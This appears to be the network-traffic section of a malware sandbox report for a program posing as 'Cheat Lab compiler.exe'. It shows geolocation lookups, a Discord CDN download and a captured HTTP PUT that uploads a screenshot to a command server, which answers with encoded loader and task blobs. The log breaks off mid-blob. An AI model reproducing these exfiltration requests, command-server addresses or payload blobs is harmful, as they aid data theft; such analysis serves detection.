                                                          Jan 12, 2024 23:12:38.890948057 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.891762972 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.891838074 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.892436981 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.892503977 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.892535925 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.892590046 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.894061089 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.894130945 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.894216061 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.894285917 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.894476891 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.894543886 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.894750118 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.894805908 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.895698071 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.895761013 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.898958921 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.899041891 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.899061918 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.899080038 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.899106026 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.899127960 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.899166107 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.899230003 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.901278019 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.901329994 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.901362896 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.901375055 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.901401043 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.901422977 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.902661085 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.902714968 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.902745962 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.902755976 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.902784109 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.902818918 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.904489040 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.904536009 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.904567957 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.904577971 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.904608011 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.904624939 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.906533003 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.906574011 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.906614065 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.906625032 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.906653881 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.906677008 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.907753944 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.907797098 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.907838106 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.907847881 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.907876015 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.907898903 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.909816980 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.909863949 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.909943104 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.909943104 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.909957886 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.910012960 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.989139080 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.989200115 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.989247084 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.989264011 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.989295006 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.989312887 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087259054 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087281942 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087354898 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087471008 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087471008 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087488890 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087517023 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087548018 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087590933 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087604046 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087624073 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087635040 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087641001 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087651968 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087662935 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087704897 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087706089 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087728024 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087742090 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.087769985 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.087799072 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.099525928 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.099545956 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.099586010 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.099597931 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.099626064 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.099644899 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101632118 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101653099 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101696014 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101706028 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101726055 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101736069 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101751089 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101756096 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101766109 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101793051 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101794004 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101805925 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101816893 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101825953 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101835012 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.101856947 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101923943 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.101923943 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.104676008 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.104693890 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.104737997 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.104748011 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.104782104 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.104799986 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105424881 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105443001 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105487108 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105490923 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105501890 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105504036 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105540037 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105562925 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105562925 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105571985 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105583906 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105616093 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105632067 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105652094 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105663061 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105663061 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105676889 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105735064 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105747938 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105747938 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105747938 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105762959 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105773926 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105807066 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105825901 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105829954 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105839968 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105868101 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105904102 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105914116 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105953932 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.105953932 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.105953932 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.865466118 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.865479946 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.865534067 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.865638018 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.865664005 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.877007961 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.877021074 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.877074957 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.877104998 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.877249956 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.877265930 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.877300978 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.877331018 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.877355099 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.877355099 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.877449989 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.877477884 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.877571106 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.916210890 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.916224003 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.916270018 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.916341066 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.916383982 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.931793928 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.931807041 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.931843996 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.931878090 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.932007074 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.932023048 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.932074070 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.932086945 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.932158947 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.932209015 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.989516020 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.989567995 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.989635944 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.989767075 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.010926962 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.010978937 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.011054993 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.011099100 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.011219978 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.011240959 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.011312962 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.011327982 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.011388063 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.011451006 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.092417955 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.092469931 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.092520952 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.092587948 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.092657089 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.121701956 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.121711969 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.121742010 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.121918917 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.191500902 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.217466116 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.353669882 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.353729010 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:13:00.101795912 CET8049735208.95.112.1192.168.2.4
                                                          Jan 12, 2024 23:13:00.103936911 CET4973580192.168.2.4208.95.112.1
                                                          Jan 12, 2024 23:13:11.479496956 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:13:11.705925941 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:13:11.921124935 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:13:11.924226999 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:13:11.985667944 CET4973580192.168.2.4208.95.112.1
                                                          Jan 12, 2024 23:13:11.985841990 CET4973880192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:13:11.985932112 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:14:09.889954090 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.117556095 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.117711067 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.133248091 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.360111952 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.406512022 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.418900967 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.646661043 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.687752008 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.727613926 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.955528975 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955594063 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955636978 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955672979 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955679893 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.955693960 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955717087 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955739975 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955841064 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955866098 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.955912113 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.955921888 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:11.000349998 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:13.086354971 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:13.312432051 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.312484026 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.312526941 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:13.312592030 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:13.313313961 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.313348055 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.313390970 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:13.538120985 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.538181067 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.538361073 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.538463116 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.539247036 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.539283037 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.553344011 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.594010115 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:16.059206009 CET4974129975192.168.2.445.15.156.186
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 12, 2024 23:12:22.895302057 CET | 55953 | 53 | 192.168.2.4 | 1.1.1.1
Jan 12, 2024 23:12:22.991779089 CET | 53 | 55953 | 1.1.1.1 | 192.168.2.4
Jan 12, 2024 23:12:37.799510956 CET | 59478 | 53 | 192.168.2.4 | 1.1.1.1
Jan 12, 2024 23:12:37.895229101 CET | 53 | 59478 | 1.1.1.1 | 192.168.2.4
Jan 12, 2024 23:13:27.369075060 CET | 50821 | 53 | 192.168.2.4 | 1.1.1.1
Jan 12, 2024 23:13:27.468808889 CET | 53 | 50821 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 12, 2024 23:12:22.895302057 CET | 192.168.2.4 | 1.1.1.1 | 0xd6ed | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 12, 2024 23:12:37.799510956 CET | 192.168.2.4 | 1.1.1.1 | 0x3c7b | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001) | false
Jan 12, 2024 23:13:27.369075060 CET | 192.168.2.4 | 1.1.1.1 | 0x93f0 | Standard query (0) | KualBsmtIVFpTexCtErDRKSXzMSbr.KualBsmtIVFpTexCtErDRKSXzMSbr | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 12, 2024 23:12:22.991779089 CET | 1.1.1.1 | 192.168.2.4 | 0xd6ed | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 12, 2024 23:12:37.895229101 CET | 1.1.1.1 | 192.168.2.4 | 0x3c7b | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001) | false
Jan 12, 2024 23:12:37.895229101 CET | 1.1.1.1 | 192.168.2.4 | 0x3c7b | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001) | false
Jan 12, 2024 23:12:37.895229101 CET | 1.1.1.1 | 192.168.2.4 | 0x3c7b | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001) | false
Jan 12, 2024 23:12:37.895229101 CET | 1.1.1.1 | 192.168.2.4 | 0x3c7b | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001) | false
Jan 12, 2024 23:12:37.895229101 CET | 1.1.1.1 | 192.168.2.4 | 0x3c7b | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001) | false
Jan 12, 2024 23:13:27.468808889 CET | 1.1.1.1 | 192.168.2.4 | 0x93f0 | Name error (3) | KualBsmtIVFpTexCtErDRKSXzMSbr.KualBsmtIVFpTexCtErDRKSXzMSbr | none | none | A (IP address) | IN (0x0001) | false
                                                          • cdn.discordapp.com
                                                          • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 208.95.112.1 | 80 | 7720 | C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2024 23:12:23.146749973 CET | 164 | OUT | GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
                                                          Content-Type: application/json
                                                          User-Agent: Winter
                                                          Host: ip-api.com
                                                          Cache-Control: no-cache
Jan 12, 2024 23:12:23.345918894 CET | 290 | IN | HTTP/1.1 200 OK
                                                          Date: Fri, 12 Jan 2024 22:12:23 GMT
                                                          Content-Type: application/json; charset=utf-8
                                                          Content-Length: 113
                                                          Access-Control-Allow-Origin: *
                                                          X-Ttl: 60
                                                          X-Rl: 44
                                                          Data Ascii: {"status":"success","countryCode":"US","city":"Washington","timezone":"America/New_York","query":"102.165.48.42"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 213.248.43.48 | 80 | 7720 | C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2024 23:12:24.299453020 CET | 234 | OUT | PUT /loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=afAkRbIGh1tq3QYsA37XbyC4j
                                                          User-Agent: Winter
                                                          Host: 213.248.43.48
                                                          Content-Length: 3933196
                                                          Cache-Control: no-cache
Jan 12, 2024 23:12:24.300579071 CET | 11574 | OUT |
Data Ascii: --afAkRbIGh1tq3QYsA37XbyC4j
Content-Type: application/octet-stream
Content-Disposition: form-data; name="file"; filename="screen.bmp"
Jan 12, 2024 23:12:37.681456089 CET | 1286 | IN | HTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Fri, 12 Jan 2024 22:12:37 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 2048
                                                          Connection: keep-alive
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=C1BWOqKywZReICpMxAnY0Cnvg5xs02rN0Vg01PRGSL6ctfFTIJpT5tNjVVmw3zSK9S9LlUbV%2FBNeF1R7vYqbuatPKxGWPfr%2FhUnFIhr2Rr%2F%2BCS9xeK0I6LjCYtD2WG4%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          CF-RAY: 8448bdf05da265c7-FRA
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Ascii: {"loader":"YjMsNWIsZDIsYmMsYmYsOTIsYzEsZGYsYWIsYjYsZDAsYmEsYmYsZDUsYzYsOWQsYjYsOTYsOTQsOGQsN2IsYTMsNjMsNTYsOTMsYjYsYzUsZDIsYzcsZGEsYzYsNjgsNzIsNTksYTAsNmYsNmYsNTMsYzAsZDEsYjgsYjMsZTAsYzIsYmQsY2YsODQsNzIsNjQsZWYsN2MsZTEsYjQsZTQsYTgsNTYsNmMsNjEsN2UsOTQsODEsODUsN2EsYjksYWMsOWEsZTQsYjgsYzIsNTMsODgsOGMsYjIsYjMsZDcsYzcsYmYsZTQsOGUsNTgsNjYsZTgsYmIsY2YsYjcsZGMsYjcsNTYsNmMsNjEsY2MsODUsYzksY2EsZDAsYmEsNWEsNzMsOTAsNjUsOTAsOWYsNmUsZDEsYmUsYzQsZGEsYzYsN2EsZDYsYzUsOWIsYjksZTYsY2MsZDIsYWYsOTksNmYsNTQsNTQsYjQsYzUsYzQsYzksZGEsY2IsNjgsNzIsNTksZDYsYTQsYmIsYTQsYjMsZTksNzgsNzIsOGQsYmMsYzMsY2IsYzcsNWEsN2UsOTQsOGEsOTksNmIsOTksYjMsOTksYTQsYjQsYmEsZDYsYzksY2EsYzYsYTksOWQsNWIsYWEsNjMsODAsYWUs","tasks":"OTMsYjQsOTIsYWMsYjMsNTMsOD
